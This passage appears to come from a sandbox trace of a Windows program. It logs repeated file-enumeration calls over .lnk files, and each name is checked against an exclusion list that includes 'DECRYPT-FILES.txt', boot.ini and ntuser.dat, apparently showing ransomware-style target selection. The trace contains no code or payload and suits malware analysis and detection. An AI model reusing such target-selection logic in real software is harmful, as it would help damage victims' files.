H3cVvF6LlYw8C.lnk") returned 24 [0080.006] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.006] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aa0da10, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8aa0da10, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8aa0da10, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x410, dwReserved0=0x0, dwReserved1=0x0, cFileName="1v9OFDiJWPm8MHHQ.lnk", cAlternateFileName="1V9OFD~1.LNK")) returned 1 [0080.006] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0080.006] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.lnk", lpString2="autorun.inf") returned -1 [0080.006] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.lnk", lpString2="boot.ini") returned -1 [0080.006] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.lnk", lpString2="desktop.ini") returned -1 [0080.006] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.lnk", lpString2="ntuser.dat") returned -1 [0080.006] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.lnk", lpString2="iconcache.db") returned -1 [0080.006] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.lnk", lpString2="bootsect.bak") returned -1 [0080.006] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.lnk", lpString2="ntuser.dat.log") returned -1 [0080.006] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.lnk", lpString2="thumbs.db") returned -1 [0080.006] lstrcmpiW (lpString1="1v9OFDiJWPm8MHHQ.lnk", lpString2="Bootfont.bin") returned -1 [0080.006] lstrlenW (lpString="1v9OFDiJWPm8MHHQ.lnk") returned 20 [0080.007] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.007] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a2c36b0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8a2c36b0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8a2c36b0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x2a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="3fm.lnk", cAlternateFileName="")) returned 1 [0080.007] lstrcmpiW (lpString1="3fm.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0080.007] lstrcmpiW (lpString1="3fm.lnk", lpString2="autorun.inf") returned -1 [0080.007] lstrcmpiW (lpString1="3fm.lnk", lpString2="boot.ini") returned -1 [0080.007] lstrcmpiW (lpString1="3fm.lnk", lpString2="desktop.ini") returned -1 [0080.007] lstrcmpiW (lpString1="3fm.lnk", lpString2="ntuser.dat") returned -1 [0080.007] lstrcmpiW (lpString1="3fm.lnk", lpString2="iconcache.db") returned -1 [0080.007] lstrcmpiW (lpString1="3fm.lnk", lpString2="bootsect.bak") returned -1 [0080.007] lstrcmpiW (lpString1="3fm.lnk", lpString2="ntuser.dat.log") returned -1 [0080.007] lstrcmpiW (lpString1="3fm.lnk", lpString2="thumbs.db") returned -1 [0080.007] lstrcmpiW (lpString1="3fm.lnk", lpString2="Bootfont.bin") returned -1 [0080.007] lstrlenW (lpString="3fm.lnk") returned 7 [0080.007] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.007] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b099690, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8b099690, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8b099690, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x15a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="52sYE55ED9y1bqufgLex.lnk", cAlternateFileName="52SYE5~1.LNK")) returned 1 [0080.007] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0080.007] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.lnk", lpString2="autorun.inf") returned -1 [0080.007] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.lnk", lpString2="boot.ini") returned -1 [0080.007] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.lnk", lpString2="desktop.ini") returned -1 [0080.007] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.lnk", lpString2="ntuser.dat") returned -1 [0080.007] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.lnk", lpString2="iconcache.db") returned -1 [0080.007] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.lnk", lpString2="bootsect.bak") returned -1 [0080.007] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.lnk", lpString2="ntuser.dat.log") returned -1 [0080.007] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.lnk", lpString2="thumbs.db") returned -1 [0080.007] lstrcmpiW (lpString1="52sYE55ED9y1bqufgLex.lnk", lpString2="Bootfont.bin") returned -1 [0080.007] lstrlenW (lpString="52sYE55ED9y1bqufgLex.lnk") returned 24 [0080.007] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.007] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ab8a7d0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8ab8a7d0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8ab8a7d0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x415, dwReserved0=0x0, dwReserved1=0x0, cFileName="5hXhWeztPrf9ZQC1Z.lnk", cAlternateFileName="5HXHWE~1.LNK")) returned 1 [0080.007] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0080.007] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.lnk", lpString2="autorun.inf") returned -1 [0080.007] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.lnk", lpString2="boot.ini") returned -1 [0080.007] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.lnk", lpString2="desktop.ini") returned -1 [0080.007] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.lnk", lpString2="ntuser.dat") returned -1 [0080.007] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.lnk", lpString2="iconcache.db") returned -1 [0080.007] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.lnk", lpString2="bootsect.bak") returned -1 [0080.007] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.lnk", lpString2="ntuser.dat.log") returned -1 [0080.007] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.lnk", lpString2="thumbs.db") returned -1 [0080.008] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.lnk", lpString2="Bootfont.bin") returned -1 [0080.008] lstrlenW (lpString="5hXhWeztPrf9ZQC1Z.lnk") returned 21 [0080.008] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.008] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a54ae10, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8a54ae10, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8a54ae10, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x156a, dwReserved0=0x0, dwReserved1=0x0, cFileName="5jCFbrHSiWDWqLk.lnk", cAlternateFileName="5JCFBR~1.LNK")) returned 1 [0080.008] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0080.008] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.lnk", lpString2="autorun.inf") returned -1 [0080.008] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.lnk", lpString2="boot.ini") returned -1 [0080.008] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.lnk", lpString2="desktop.ini") returned -1 [0080.008] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.lnk", lpString2="ntuser.dat") returned -1 [0080.008] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.lnk", lpString2="iconcache.db") returned -1 [0080.008] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.lnk", lpString2="bootsect.bak") returned -1 [0080.008] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.lnk", lpString2="ntuser.dat.log") returned -1 [0080.008] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.lnk", lpString2="thumbs.db") returned -1 [0080.008] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.lnk", lpString2="Bootfont.bin") returned -1 [0080.008] lstrlenW (lpString="5jCFbrHSiWDWqLk.lnk") returned 19 [0080.008] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.008] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b131c10, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8b131c10, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8b131c10, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x135f, dwReserved0=0x0, dwReserved1=0x0, cFileName="5xeQDqiQHYKki.lnk", cAlternateFileName="5XEQDQ~1.LNK")) returned 1 [0080.008] lstrcmpiW (lpString1="5xeQDqiQHYKki.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0080.008] lstrcmpiW (lpString1="5xeQDqiQHYKki.lnk", lpString2="autorun.inf") returned -1 [0080.008] lstrcmpiW (lpString1="5xeQDqiQHYKki.lnk", lpString2="boot.ini") returned -1 [0080.008] lstrcmpiW (lpString1="5xeQDqiQHYKki.lnk", lpString2="desktop.ini") returned -1 [0080.008] lstrcmpiW (lpString1="5xeQDqiQHYKki.lnk", lpString2="ntuser.dat") returned -1 [0080.008] lstrcmpiW (lpString1="5xeQDqiQHYKki.lnk", lpString2="iconcache.db") returned -1 [0080.008] lstrcmpiW (lpString1="5xeQDqiQHYKki.lnk", lpString2="bootsect.bak") returned -1 [0080.008] lstrcmpiW (lpString1="5xeQDqiQHYKki.lnk", lpString2="ntuser.dat.log") returned -1 [0080.008] lstrcmpiW (lpString1="5xeQDqiQHYKki.lnk", lpString2="thumbs.db") returned -1 [0080.008] lstrcmpiW (lpString1="5xeQDqiQHYKki.lnk", lpString2="Bootfont.bin") returned -1 [0080.008] lstrlenW (lpString="5xeQDqiQHYKki.lnk") returned 17 [0080.008] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.008] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8993deb0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8993deb0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8993deb0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xa4d, dwReserved0=0x0, dwReserved1=0x0, cFileName="5zUARQ_fQofL.lnk", cAlternateFileName="5ZUARQ~1.LNK")) returned 1 [0080.008] lstrcmpiW (lpString1="5zUARQ_fQofL.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0080.008] lstrcmpiW (lpString1="5zUARQ_fQofL.lnk", lpString2="autorun.inf") returned -1 [0080.008] lstrcmpiW (lpString1="5zUARQ_fQofL.lnk", lpString2="boot.ini") returned -1 [0080.008] lstrcmpiW (lpString1="5zUARQ_fQofL.lnk", lpString2="desktop.ini") returned -1 [0080.008] lstrcmpiW (lpString1="5zUARQ_fQofL.lnk", lpString2="ntuser.dat") returned -1 [0080.009] lstrcmpiW (lpString1="5zUARQ_fQofL.lnk", lpString2="iconcache.db") returned -1 [0080.009] lstrcmpiW (lpString1="5zUARQ_fQofL.lnk", lpString2="bootsect.bak") returned -1 [0080.009] lstrcmpiW (lpString1="5zUARQ_fQofL.lnk", lpString2="ntuser.dat.log") returned -1 [0080.009] lstrcmpiW (lpString1="5zUARQ_fQofL.lnk", lpString2="thumbs.db") returned -1 [0080.009] lstrcmpiW (lpString1="5zUARQ_fQofL.lnk", lpString2="Bootfont.bin") returned -1 [0080.009] lstrlenW (lpString="5zUARQ_fQofL.lnk") returned 16 [0080.009] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.009] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a30f970, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8a30f970, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8a30f970, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xf31, dwReserved0=0x0, dwReserved1=0x0, cFileName="60wQ6b0LwaRhMx.flv.lnk", cAlternateFileName="60WQ6B~1.LNK")) returned 1 [0080.009] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0080.009] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv.lnk", lpString2="autorun.inf") returned -1 [0080.009] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv.lnk", lpString2="boot.ini") returned -1 [0080.009] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv.lnk", lpString2="desktop.ini") returned -1 [0080.009] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv.lnk", lpString2="ntuser.dat") returned -1 [0080.009] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv.lnk", lpString2="iconcache.db") returned -1 [0080.009] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv.lnk", lpString2="bootsect.bak") returned -1 [0080.009] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv.lnk", lpString2="ntuser.dat.log") returned -1 [0080.009] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv.lnk", lpString2="thumbs.db") returned -1 [0080.010] lstrcmpiW (lpString1="60wQ6b0LwaRhMx.flv.lnk", lpString2="Bootfont.bin") returned -1 [0080.010] lstrlenW (lpString="60wQ6b0LwaRhMx.flv.lnk") returned 22 [0080.010] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.010] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89db47f0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8b131c10, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8b131c10, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xe20, dwReserved0=0x0, dwReserved1=0x0, cFileName="6FQU.lnk", cAlternateFileName="")) returned 1 [0080.010] lstrcmpiW (lpString1="6FQU.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0080.010] lstrcmpiW (lpString1="6FQU.lnk", lpString2="autorun.inf") returned -1 [0080.010] lstrcmpiW (lpString1="6FQU.lnk", lpString2="boot.ini") returned -1 [0080.010] lstrcmpiW (lpString1="6FQU.lnk", lpString2="desktop.ini") returned -1 [0080.010] lstrcmpiW (lpString1="6FQU.lnk", lpString2="ntuser.dat") returned -1 [0080.010] lstrcmpiW (lpString1="6FQU.lnk", lpString2="iconcache.db") returned -1 [0080.010] lstrcmpiW (lpString1="6FQU.lnk", lpString2="bootsect.bak") returned -1 [0080.010] lstrcmpiW (lpString1="6FQU.lnk", lpString2="ntuser.dat.log") returned -1 [0080.010] lstrcmpiW (lpString1="6FQU.lnk", lpString2="thumbs.db") returned -1 [0080.010] lstrcmpiW (lpString1="6FQU.lnk", lpString2="Bootfont.bin") returned -1 [0080.010] lstrlenW (lpString="6FQU.lnk") returned 8 [0080.010] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.010] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a890c50, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8a890c50, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8a890c50, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xef7, dwReserved0=0x0, dwReserved1=0x0, cFileName="6pqbaFAB59 bjsw9TrUE.lnk", cAlternateFileName="6PQBAF~1.LNK")) returned 1 [0080.010] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0080.010] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.lnk", lpString2="autorun.inf") returned -1 [0080.010] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.lnk", lpString2="boot.ini") returned -1 [0080.010] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.lnk", lpString2="desktop.ini") returned -1 [0080.010] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.lnk", lpString2="ntuser.dat") returned -1 [0080.010] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.lnk", lpString2="iconcache.db") returned -1 [0080.010] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.lnk", lpString2="bootsect.bak") returned -1 [0080.010] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.lnk", lpString2="ntuser.dat.log") returned -1 [0080.010] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.lnk", lpString2="thumbs.db") returned -1 [0080.010] lstrcmpiW (lpString1="6pqbaFAB59 bjsw9TrUE.lnk", lpString2="Bootfont.bin") returned -1 [0080.010] lstrlenW (lpString="6pqbaFAB59 bjsw9TrUE.lnk") returned 24 [0080.010] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.010] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aaf2250, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8aaf2250, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8aaf2250, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xfbf, dwReserved0=0x0, dwReserved1=0x0, cFileName="7xwnnge1dMI4u1n8p.lnk", cAlternateFileName="7XWNNG~1.LNK")) returned 1 [0080.010] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0080.010] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.lnk", lpString2="autorun.inf") returned -1 [0080.010] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.lnk", lpString2="boot.ini") returned -1 [0080.010] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.lnk", lpString2="desktop.ini") returned -1 [0080.010] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.lnk", lpString2="ntuser.dat") returned -1 [0080.010] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.lnk", lpString2="iconcache.db") returned -1 [0080.010] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.lnk", lpString2="bootsect.bak") returned -1 [0080.011] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.lnk", lpString2="ntuser.dat.log") returned -1 [0080.011] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.lnk", lpString2="thumbs.db") returned -1 [0080.011] lstrcmpiW (lpString1="7xwnnge1dMI4u1n8p.lnk", lpString2="Bootfont.bin") returned -1 [0080.011] lstrlenW (lpString="7xwnnge1dMI4u1n8p.lnk") returned 21 [0080.011] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.011] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b027270, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8b027270, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8b027270, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x9d5, dwReserved0=0x0, dwReserved1=0x0, cFileName="7zLH.lnk", cAlternateFileName="")) returned 1 [0080.011] lstrcmpiW (lpString1="7zLH.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0080.011] lstrcmpiW (lpString1="7zLH.lnk", lpString2="autorun.inf") returned -1 [0080.011] lstrcmpiW (lpString1="7zLH.lnk", lpString2="boot.ini") returned -1 [0080.011] lstrcmpiW (lpString1="7zLH.lnk", lpString2="desktop.ini") returned -1 [0080.011] lstrcmpiW (lpString1="7zLH.lnk", lpString2="ntuser.dat") returned -1 [0080.011] lstrcmpiW (lpString1="7zLH.lnk", lpString2="iconcache.db") returned -1 [0080.011] lstrcmpiW (lpString1="7zLH.lnk", lpString2="bootsect.bak") returned -1 [0080.011] lstrcmpiW (lpString1="7zLH.lnk", lpString2="ntuser.dat.log") returned -1 [0080.011] lstrcmpiW (lpString1="7zLH.lnk", lpString2="thumbs.db") returned -1 [0080.011] lstrcmpiW (lpString1="7zLH.lnk", lpString2="Bootfont.bin") returned -1 [0080.011] lstrlenW (lpString="7zLH.lnk") returned 8 [0080.011] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.011] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a0ae370, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8a0ae370, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8a0ae370, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x9ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="8XdinFYWI5XC.mkv.lnk", cAlternateFileName="8XDINF~1.LNK")) returned 1 [0080.011] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0080.011] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv.lnk", lpString2="autorun.inf") returned -1 [0080.011] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv.lnk", lpString2="boot.ini") returned -1 [0080.011] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv.lnk", lpString2="desktop.ini") returned -1 [0080.011] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv.lnk", lpString2="ntuser.dat") returned -1 [0080.011] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv.lnk", lpString2="iconcache.db") returned -1 [0080.011] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv.lnk", lpString2="bootsect.bak") returned -1 [0080.011] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv.lnk", lpString2="ntuser.dat.log") returned -1 [0080.011] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv.lnk", lpString2="thumbs.db") returned -1 [0080.011] lstrcmpiW (lpString1="8XdinFYWI5XC.mkv.lnk", lpString2="Bootfont.bin") returned -1 [0080.011] lstrlenW (lpString="8XdinFYWI5XC.mkv.lnk") returned 20 [0080.011] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.011] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ae11f30, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8ae11f30, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8ae11f30, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1b12, dwReserved0=0x0, dwReserved1=0x0, cFileName="8x_O2ZZ-dI_F.lnk", cAlternateFileName="8X_O2Z~1.LNK")) returned 1 [0080.011] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0080.011] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.lnk", lpString2="autorun.inf") returned -1 [0080.011] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.lnk", lpString2="boot.ini") returned -1 [0080.011] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.lnk", lpString2="desktop.ini") returned -1 [0080.011] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.lnk", lpString2="ntuser.dat") returned -1 [0080.011] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.lnk", lpString2="iconcache.db") returned -1 [0080.012] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.lnk", lpString2="bootsect.bak") returned -1 [0080.012] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.lnk", lpString2="ntuser.dat.log") returned -1 [0080.012] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.lnk", lpString2="thumbs.db") returned -1 [0080.012] lstrcmpiW (lpString1="8x_O2ZZ-dI_F.lnk", lpString2="Bootfont.bin") returned -1 [0080.012] lstrlenW (lpString="8x_O2ZZ-dI_F.lnk") returned 16 [0080.012] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.012] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ac6f010, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8ac6f010, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8ac6f010, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xa21, dwReserved0=0x0, dwReserved1=0x0, cFileName="94tBqj 9I.lnk", cAlternateFileName="94TBQJ~1.LNK")) returned 1 [0080.012] lstrcmpiW (lpString1="94tBqj 9I.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0080.012] lstrcmpiW (lpString1="94tBqj 9I.lnk", lpString2="autorun.inf") returned -1 [0080.012] lstrcmpiW (lpString1="94tBqj 9I.lnk", lpString2="boot.ini") returned -1 [0080.012] lstrcmpiW (lpString1="94tBqj 9I.lnk", lpString2="desktop.ini") returned -1 [0080.012] lstrcmpiW (lpString1="94tBqj 9I.lnk", lpString2="ntuser.dat") returned -1 [0080.012] lstrcmpiW (lpString1="94tBqj 9I.lnk", lpString2="iconcache.db") returned -1 [0080.012] lstrcmpiW (lpString1="94tBqj 9I.lnk", lpString2="bootsect.bak") returned -1 [0080.012] lstrcmpiW (lpString1="94tBqj 9I.lnk", lpString2="ntuser.dat.log") returned -1 [0080.012] lstrcmpiW (lpString1="94tBqj 9I.lnk", lpString2="thumbs.db") returned -1 [0080.012] lstrcmpiW (lpString1="94tBqj 9I.lnk", lpString2="Bootfont.bin") returned -1 [0080.012] lstrlenW (lpString="94tBqj 9I.lnk") returned 13 [0080.012] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.012] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b04d3d0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8b04d3d0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8b04d3d0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x3fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="9hYC b9 OAgc.lnk", 